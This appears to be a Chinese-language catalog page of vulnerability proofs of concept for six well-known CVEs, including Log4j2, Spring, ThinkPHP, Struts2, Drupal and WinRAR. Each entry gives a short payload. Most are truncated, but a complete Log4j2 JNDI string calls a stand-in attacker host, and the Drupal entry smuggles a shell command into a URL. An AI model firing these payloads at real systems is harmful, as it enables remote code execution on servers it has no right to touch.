漏洞POC
常见漏洞POC与利用代码
共 6 个POC • 6 个CVE • 5 个仓库 • 9 个标签
Log4j2 JNDI注入
CVE-2021-44228Apache Log4j2 存在JNDI注入漏洞,可导致远程代码执行
Payload
${jndi:ldap://evil.com/a}Spring Core RCE
CVE-2022-22965Spring Framework 远程代码执行漏洞
Payload
class.module.getClassLoader().addUrl...
ThinkPHP RCE
CVE-2018-20062ThinkPHP 远程代码执行漏洞
Payload
?s=index/think\app/invokefunction&function=call_user_func_array...
Apache Struts2 RCE
CVE-2017-5638Apache Struts2 远程代码执行漏洞
Payload
%{#context["com.opensymphony.xwork2"].getValue("memberAccess").excludedClasses}Drupalgeddon2
CVE-2018-7600Drupal Core 远程代码执行漏洞
Payload
user/%2$|%20whoami%20%7C
WinRAR ACE
CVE-2018-20250WinRAR 目录穿越漏洞,可执行任意代码
Payload
acefile.extract(target, items=content)